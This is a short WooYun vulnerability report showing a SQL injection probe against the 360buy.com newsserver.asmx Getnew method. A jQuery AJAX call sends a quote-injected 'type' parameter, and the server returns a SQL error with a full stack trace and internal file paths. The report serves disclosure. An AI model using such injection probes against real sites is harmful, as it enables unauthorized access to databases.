WooYun.org

http://www.360buy.com/newsserver.asmx
fireBug 下
$.jmsajax(
{
url: "newsserver.asmx",
method: "Getnew",
data:
{
type:'ss\'',
num:3
},
success: function(data)
{

alert(data);
}
});
http://www.360buy.com/newsserver.asmx/Getnew
{"Message":"列名 \u0027ss\u0027 无效。","StackTrace":" 在 System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)\r\n 在 System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection)\r\n 在 System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj)\r\n 在 System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj)\r\n 在 System.Data.SqlClient.SqlDataReader.ConsumeMetaData()\r\n 在 System.Data.SqlClient.SqlDataReader.get_MetaData()\r\n 在 System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString)\r\n 在 System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async)\r\n 在 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result)\r\n 在 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method)\r\n 在 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method)\r\n 在 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)\r\n 在 Web2008.CatalogSystem.Dao.SqlHelper.ExecuteReader(String connectionString, CommandType cmdType, String cmdText, SqlParameter[] commandParameters) 位置 D:\\workspace\\www.360buy.com\\Web2008.CatalogSystem\\Dao\\SQLHelper.cs:行号 129\r\n 在 Web2008.CatalogSystem.Dao.CatalogDao.getnewslist(String type, String type2, Int32 num) 位置 D:\\workspace\\www.360buy.com\\Web2008.CatalogSystem\\Dao\\CatalogDao.cs:行号 633\r\n 在 Web2008.CatalogSystem.Service.CacheCatalogProvider.getnewslist(String type, String type2, Int32 num) 位置 D:\\workspace\\www.360buy.com\\Web2008.CatalogSystem\\Service\\CacheCatalogProvider.cs:行号 233\r\n 在 Web2008.UISystem.news.getnew(String type, String type2, Int32 num, String keys) 位置 D:\\workspace\\www.360buy.com\\Web2008.UISystem\\news.cs:行号 218\r\n 在 Web2008.UISystem.news.getnew(String type, String type2, Int32 num) 位置 D:\\workspace\\www.360buy.com\\Web2008.UISystem\\news.cs:行号 184\r\n 在 newsserver.Getnew(String type, Int32 num) 位置 d:\\workspace\\www.360buy.com\\www.360buy.com\\360buy.comWeb\\App_Code\\newsserver.cs:行号 70","ExceptionType":"System.Data.SqlClient.SqlException"}